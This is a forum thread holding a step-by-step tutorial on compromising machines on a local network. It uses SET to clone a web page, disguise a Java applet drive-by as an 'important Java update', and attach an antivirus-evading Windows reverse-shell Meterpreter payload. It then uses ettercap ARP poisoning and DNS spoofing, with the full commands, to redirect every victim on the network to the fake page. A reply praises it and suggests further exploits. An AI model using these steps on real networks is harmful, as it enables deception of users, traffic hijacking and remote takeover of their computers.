Results 1 to 2 of 2

Thread: SET + ettercap

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011

    Default SET + ettercap

    How to get into local machines using SET + ETTERCAP

    I dontīt know if this is right here in the Expert Section, but I donīt think this fits into General Topics and I canīt directly post into the Howtoīs section.
    This Howto describes how you can use SET + ettercap (dns_spoof plugin) together in a good way.

    Step 1: Setting up the Fake-Page

    a. Start SET

    b. Choose Website Attack Attack Vectors by typing 1

    c. Choose Java Applet Attack

    d. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
    so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example, and after cloning I edited the index.html with changing the JAVA + YOU, DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to use this option, you can simply use the Site-Cloner from SET, too.

    e. After choosing your site, you have to choose the Payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.

    f. Now you have to choose the encryption of the Payload , so that it wont get detected by the victims AV. Just choose 16 (Backdoored Executable), which is currently the best.

    g. Yet SET is setting up a Metasploit-Listener, which will show you if someone clicked on your Java DriveBy. You MUST keep this window open.

    Step 2: Use ettercap to redirect slave/s to your fake-site

    a. The first thing you have to do, is opening the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:

    * A yourip
    If you only want to redirect one page, write this:

    thesiteyouwanttoredirect A yourip
    So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):

    * A
    b. Running ettercap

    After configuring everything, you can now run the following command:

    ettercap -T -q -P dns_spoof -M ARP // //
    This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
    If you want to redirect only one single PC, you have to run this command:

    ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //
    And here is what the parameters actually mean:
    -T means Text Interface, so you got no annoying GUI
    -q means silent mode, ettercap doesnt display everything it does (which were really annoying)
    -P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
    -M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC

    So thats it, I hope you like my tutorial, and if you do so, please comment it If you got any questions, feel free to ask me!

    Tutorial by Fiddl aka Jodokus

  2. #2
    Just burned their ISO
    Join Date
    Sep 2011

    Default AW: SET + ettercap

    I was writing on a same tutorial, now i can cancel that, your tutorial is perfect =). Propably you could mention the VNCINJECT or some mfsexploits in use with dnsspoofing

Similar Threads

  1. ettercap & SSL
    By ironclaw in forum OLD Newbie Area
    Replies: 0
    Last Post: 04-04-2010, 02:23 PM
  2. Ettercap
    By lupastro in forum Soporte en Software
    Replies: 0
    Last Post: 01-19-2010, 12:34 PM
  3. ettercap
    By dutch85 in forum OLD Newbie Area
    Replies: 3
    Last Post: 11-27-2009, 05:39 PM
  4. Ettercap-GTK
    By prairie-guy in forum OLD BT4beta Bugs and Fixes
    Replies: 3
    Last Post: 03-29-2009, 04:33 AM
  5. Ettercap IP?
    By musik4u66 in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-07-2008, 09:15 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts